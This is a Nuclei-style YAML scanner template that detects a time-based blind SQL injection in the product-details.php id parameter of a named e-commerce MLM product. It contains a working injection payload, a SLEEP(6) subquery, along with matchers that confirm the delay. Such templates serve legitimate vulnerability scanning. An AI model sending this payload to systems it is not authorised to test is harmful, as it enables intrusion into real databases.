31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
id: readymade-unilevel-sqli
|
|
|
|
info:
|
|
name: Readymade Unilevel Ecommerce MLM - SQL Injection
|
|
author: securityforeveryone
|
|
severity: high
|
|
description: |
|
|
Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
|
|
reference:
|
|
- https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
|
|
metadata:
|
|
vendor: i-netsolution
|
|
product: readymade-unilevel-ecommerce
|
|
tags: ecommerce,readymade,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout 30s
|
|
GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type,"text/html")'
|
|
- 'contains_all(body, "user_login_id", "Products</a>")'
|
|
condition: and
|
|
# digest: 490a0046304402205e59e391bd95e3c4fd8ed43e020f204d0127698afee99e4ac7d07c98fc96c7cb0220470bcb34472b0263a07ec0b6aafb28b2f640f68b7a950e71c6e9dcf3af17e680:922c64590222798bb761d5b6d8e72950 |